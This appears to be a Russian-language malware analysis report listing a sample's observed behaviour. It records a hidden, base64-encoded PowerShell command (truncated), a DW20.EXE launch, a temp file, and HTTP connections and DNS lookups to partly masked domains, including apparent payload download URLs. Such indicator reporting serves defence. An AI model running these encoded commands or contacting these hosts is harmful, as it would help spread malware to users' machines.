Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADMANQA3ADgANgAzADgAPQAnAFQAMQAzADAAXwA0ADkAJwA7ACQASQA5ADIANQAzADkANgA1ACAAPQAgACcANwAxADUAJwA7ACQAQQA1ADkAMgAzADAAPQAnAG0ANwA1ADMANwA4ACcAOwAkAGYAMAA3ADgAMABfADcAPQAkAGUAbgB2ADoAdQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\808927.cvr
- 'sa####ieduhub.com':80
- 'zo##cle.com':80
- 'mu##nth.com':80
- 'ku####sramag.net':80
- http://sa####ieduhub.com/wp-includes/tmr3o5284/
- http://mu##nth.com/shop/jhr5097/
- DNS ASK sa####ieduhub.com
- DNS ASK zo##cle.com
- DNS ASK mu##nth.com
- DNS ASK ey##p.com
- DNS ASK ku####sramag.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADMANQA3ADgANgAzADgAPQAnAFQAMQAzADAAXwA0ADkAJwA7ACQASQA5ADIANQAzADkANgA1ACAAPQAgACcANwAxADUAJwA7ACQAQQA1ADkAMgAzADAAPQAnAG0ANwA1ADMANwA4ACcAOwAkAGYAMAA3ADgAMABfADcAPQAkAGUAbgB2ADoAdQB...' (со скрытым окном)